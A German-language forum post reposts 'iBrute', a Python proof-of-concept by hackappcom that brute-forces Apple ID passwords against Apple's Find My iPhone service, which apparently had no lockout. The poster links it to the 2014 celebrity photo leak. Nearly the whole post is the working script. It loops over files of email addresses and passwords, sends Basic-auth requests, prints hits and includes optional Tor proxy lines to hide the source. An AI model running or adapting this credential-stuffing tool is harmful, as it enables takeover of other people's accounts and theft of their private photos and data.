iBrute

This site uses cookies. By continuing to browse this site, you are agreeing to our use of cookies. More details

  • Hier ein denkbar einfaches Python Skript, welches in dieser oder so ähnlicher Form wahrscheinlich beim #Fappening vor 2 Monaten eine wichtige Rolle gespielt hat.
    Wir erinnern uns, es gab wohl keine Eingabebeschränkung bei einem Background-Dienst.

    !!! Das Skript ist nicht von mir, ich poste es nur (unbearbeitet und mit Verweis auf Original-Autor) !!!

    Python Source Code

    1. # -*- coding: utf-8 -*-
    2. #
    3. #hackapp.com
    4. #@hackappcom p0c for FindMyIphone bug
    5. #allows to bruteforce passwords without AppleID lock.
    6. #Before you start, make sure it's not illegal in your country.
    7. #Have a nice brute
    8. import json
    9. import urllib2
    10. import plistlib
    11. from xml.dom.minidom import *
    12. from lxml import etree
    13. import unicodedata
    14. import re
    15. import xml.etree.ElementTree
    16. import time
    17. import random
    18. import json
    19. import cookielib
    20. import urllib
    21. import time
    22. import socket
    23. import base64
    24. from time import strftime
    25. import socks
    26. import socket
    27. #Uncomment to user t0r, or any other socks5 proxy
    28. #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
    29. #socket.socket = socks.socksocket
    30. def TryPass(apple_id,password):
    31. url = 'https://fmipmobile.icloud.com/fmipservice/device/'+apple_id+'/initClient'
    32. headers = {
    33. 'User-Agent': 'FindMyiPhone/376 CFNetwork/672.0.8 Darwin/14.0.0',
    34. }
    35. json = {
    36. "clientContext": {
    37. "appName": "FindMyiPhone",
    38. "osVersion": "7.0.4",
    39. "clientTimestamp": 429746389281,
    40. "appVersion": "3.0",
    41. #make it random!
    42. "deviceUDID": "0123456789485ef5b1e6c4f356453be033d15622",
    43. "inactiveTime": 1,
    44. "buildVersion": "376",
    45. "productType": "iPhone6,1"
    46. },
    47. "serverContext": {}
    48. }
    49. req_plist=plistlib.writePlistToString(json)
    50. req = urllib2.Request(url, req_plist, headers=headers)
    51. base64string = base64.encodestring('%s:%s' % (apple_id, password)).replace('\n', '')
    52. req.add_header("Authorization", "Basic %s" % base64string)
    53. try:
    54. resp = urllib2.urlopen(req)
    55. except urllib2.HTTPError, err:
    56. if err.code == 401:
    57. return False
    58. if err.code == 330:
    59. return True
    60. return 'bad'
    61. file = open('passlist.txt','r')
    62. passwords = file.read()
    63. file.close()
    64. file = open('mails.txt','r')
    65. apple_ids = file.read()
    66. file.close()
    67. for apple_id in apple_ids.split('\n'):
    68. if apple_id:
    69. print 'Working with:',apple_id
    70. for pwd in passwords.split('\n'):
    71. if pwd:
    72. #print pwd
    73. password = pwd.split(' ')[1]
    74. print 'Trying: ', apple_id,password
    75. try:
    76. result = TryPass(apple_id,password)
    77. if result == True:
    78. print 'Got It!: ', apple_id,password
    79. if result == 'bad':
    80. print 'We are blocked!: ',apple_id,password
    81. except:
    82. print 'Protocol failed ',pwd
    Display All